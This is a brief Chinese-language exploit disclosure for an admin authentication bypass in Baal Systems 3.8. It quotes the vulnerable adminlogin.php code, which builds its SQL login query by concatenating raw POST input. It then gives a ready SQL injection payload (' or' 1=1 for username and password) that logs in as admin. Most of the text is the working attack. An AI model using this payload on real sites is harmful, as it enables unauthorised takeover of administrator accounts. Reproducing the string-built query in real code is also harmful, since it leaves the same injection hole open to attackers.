Baal Systems = 3.8 (Auth Bypass) 后台万能登入漏洞
漏洞文件:adminlogin.php 代码: <?php
include("common.php");
if (!empty($_POST['password'])) {
$username = $_POST['username'];
$password = $_POST['password'];
$query = "select * from {$tableprefix}tbluser where username='" . $username . "' and password='" . $password . "' and userrole='admin';";
$result1 = db_query($query);
$rows = db_num_rows($result1);
$row = db_fetch_array($result1);
if ($rows != 0) {
if (session_is_registered("whossession")) {
$_SESSION['who'] = "admin";
$_SESSION['userrole'] = "admin";
$_SESSION['username'] = $username;
$_SESSION['usernum'] = $row["userid"];
header("location:admin.php");
} else {
session_register("whossession");
$_SESSION['who'] = "admin";
$_SESSION['userrole'] = "admin";
$_SESSION['username'] = $username;
$_SESSION['usernum'] = $row["userid"];
header("location:admin.php");
}
} else {
header("location:adminlogin.php?error=yes");
}
} else {
?> 利用:
url/adminlogin.php username: ' or' 1=1
Password: ' or' 1=1
